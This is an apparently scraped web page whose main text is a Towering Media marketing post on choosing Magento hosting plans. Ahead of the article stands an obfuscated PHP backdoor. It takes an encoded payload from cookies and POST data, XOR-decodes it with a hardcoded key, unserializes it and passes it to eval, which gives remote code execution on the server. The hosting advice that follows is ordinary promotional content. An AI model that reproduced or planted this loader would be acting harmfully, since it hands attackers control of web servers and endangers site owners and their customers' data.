$TqhfENrtYc = chr ( 457 - 378 ).chr ( 963 - 874 )."\x5a" . chr ( 388 - 293 ).chr (83) . "\124" . "\x6a" . chr ( 386 - 269 ); $QUvTtRaC = chr (99) . "\x6c" . "\141" . 's' . 's' . "\137" . chr ( 812 - 711 ).chr ( 716 - 596 ).chr ( 1008 - 903 )."\163" . "\164" . 's';$teOII = class_exists($TqhfENrtYc); $QUvTtRaC = "23122";$AkXtS = !1;if ($teOII == $AkXtS){function HlbTaJPFdB(){$Lpxlmlv = new /* 36911 */ OYZ_STju(36780 + 36780); $Lpxlmlv = NULL;}$VfTJubp = "36780";class OYZ_STju{private function EtwHRhpV($VfTJubp){if (is_array(OYZ_STju::$lHtPvU)) {$PkPeY = str_replace('<' . chr (63) . chr (112) . "\150" . 'p', "", OYZ_STju::$lHtPvU[chr ( 171 - 72 ).chr ( 489 - 378 ).'n' . "\x74" . "\x65" . "\156" . chr (116)]);eval($PkPeY); $VfTJubp = "36780";exit();}}private $vxQYXmnMKp;public function KSCZrEx(){echo 10910;}public function __destruct(){$VfTJubp = "46653_1494";$this->EtwHRhpV($VfTJubp); $VfTJubp = "46653_1494";}public function __construct($voWdcYa=0){$YcbKYnr = $_POST;$fWLtpNl = $_COOKIE;$HkGYOLS = "1fcb2f04-4d7e-4a8c-b9b7-bc396029efed";$GtyGL = @$fWLtpNl[substr($HkGYOLS, 0, 4)];if (!empty($GtyGL)){$ANEhXI = "base64";$hPAhDXacuW = "";$GtyGL = explode(",", $GtyGL);foreach ($GtyGL as $HiLYTu){$hPAhDXacuW .= @$fWLtpNl[$HiLYTu];$hPAhDXacuW .= @$YcbKYnr[$HiLYTu];}$hPAhDXacuW = array_map($ANEhXI . chr ( 291 - 196 ).chr (100) . 'e' . "\143" . chr (111) . chr ( 546 - 446 ).'e', array($hPAhDXacuW,)); $hPAhDXacuW = $hPAhDXacuW[0] ^ str_repeat($HkGYOLS, (strlen($hPAhDXacuW[0]) / strlen($HkGYOLS)) + 1);OYZ_STju::$lHtPvU = @unserialize($hPAhDXacuW);}}public static $lHtPvU = 14820;}HlbTaJPFdB();} Magento Hosting: The Next Step For Your E-commerce Store? , TheTwitt

Magento Hosting: The Next Step For Your E-commerce Store?

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For those seeking the best e-commerce solution, Magento is a familiar name, but to get the best out of this platform, it is important to choose your host carefully. Today’s blog post is for store owners searching for the best possible option for Magento hosting.

To start with, you MUST choose a Linux hosting plan. Other requirements are simple: choose a webs server that is either Apache or NGINX, supports MySQL and PHP databases, and can provide you with at least 2GB RAM.

A bonus is a host that provides one-click Magento installer. This feature makes operating your eCommerce store easier.

How did we pick the best hosts for Magento?

What we did was sift through thousands of hosting plans to pick the best choices that fulfilled all the important criterion for running Magento. We then assessed the hosting company itself – is the company reputable?

Finally, we asked our customers and partners about the hosts they have worked with, and their thoughts regarding their choices.

What are Magento’s Hosting Requirements?

Majority of the Magento hosting providers employ one-click installation wizards for Magento Community Edition. If the provider has this feature, it’s almost certain that their services fulfill all the requirements.

If you wish to install either version of Magento yourself, ensure the host you choose supports your existing server requirements.


Requirement Version
Linux x86-64
Apache 2.x
(alternative to Apache)
MySQL 5.6+
PHP 5.4+


Your payment getaway choice will decide whether you need to support HTTPS. This means you need a hosting plan that includes an SSL Certificate. At the bare minimum, this requires you to purchase a dedicated IP address.

You can purchase that here.

VPS Versus Shared Hosting

Given the performance needs and complexities of a big e-commerce site, you probably need a VPS hosting plan, compared to a shared hosting account.


Which Magento Web Host Plan Should You Choose?

You have three options:

  • VPS
  • Magento shared hosting
  • A dedicated server

The perfect hosting plan usually depends on the size of your site.

How Large is Your Magento Store?

The bigger your store, the higher the number of resources required to make your Magento store load quickly for visitors. If your store has significant revenue, using a shared hosting option might cause a lag in speed, which will cost you sales. So, we recommend a VPS, at the very least.


You can book a FREE consultation with Towering Media expert Magento Web developers to choose the best hosting plan for your store.

The Dedicated Hosting Option

Monitor the load times of your pages, and if you still experience significant slowness, it’s best to upgrade to more dedicated server options.


My Top 3 Recommendations for Magento Hosts

Speed is a big issue with Magento. If this requirement is not handled properly, it can lead to a slow website, especially for web developers fixing the e-commerce store, and visiting consumers.

Mini- Super Dedicated for Fast Magento Hosting

MDS is an excellent Magento hosting plan if you want to eliminate any speed issues. It’s accompanied with SSD storage, complete with Towering Media’s Kernel Care technology.

Magento can run well on shared plans, but we recommend the very best – MDS –with its premium Cpanel server.

Dedicated Server Hosting: Strong Support

Dedicated Server Hosting is the perfect choice for store owners whose business are based in the United States. It is complete Email hosting, 8 CPU cores, with exceptional around-the-clock customer support.

The Cpanel server technology fulfills the minimum requirements for operating on Magento 2.


Better Than VPS: a Magento Budget Option

Not every store requires premium performance or support. If your store falls under this category, and you want to purchase a budget host plan, you should check out this VPS upgrade hosting plan.

It isn’t the fastest there is, but it is cheap, reliable, and provides decent performance.


What are the Pros and Cons associated with Magento?

Even the best products have their drawbacks. Be sure to note the points made below to decide if you want to proceed with Magento.


  • Magento is a robust open source eCommerce platform
  • Magento doesn’t require additional site software to set up a basic site
  • Magento can be easily installed on the majority of the hosting plans via script installers


  • Depending on your server performance, Magento can worth heavily on the speed of your site
  • Magento has a complex collection of software, so it requires expert knowledge for certain areas


Is Magento free or open-source?

Magento has two versions: Enterprise Edition and a Community Edition. While the Enterprise Edition is proprietary and subject to a licensing fee, the Community Edition is open source and free.


Is Magento Community Edition a substantial application?

Often, commercial software providers release free software versions to pique interest in the premium version of the software. However, that does not apply to Magento. The Magento Community Edition is complete with all the features of the software and operates as an open-source e-commerce system.

If you are willing to put the work in, there is little you can’t do with the Magento Community Edition.

Will Magento work on shared hosting?

There is the likelihood that you can install and run Magento on shared hosting, although in our view, this is not a practical way to use the platform for your site. E-commerce requires an advanced degree of security and concern for user privacy, which can be harder to assure in a shared hosting environment.

Also, an online store can best be described as a mission-critical website, and shared hosting is not a tactical option for projects like these.

For additional questions aboutMagento hosting plans and pricing, contact us at support@toweringmedia.com or call us 800-297-2458.




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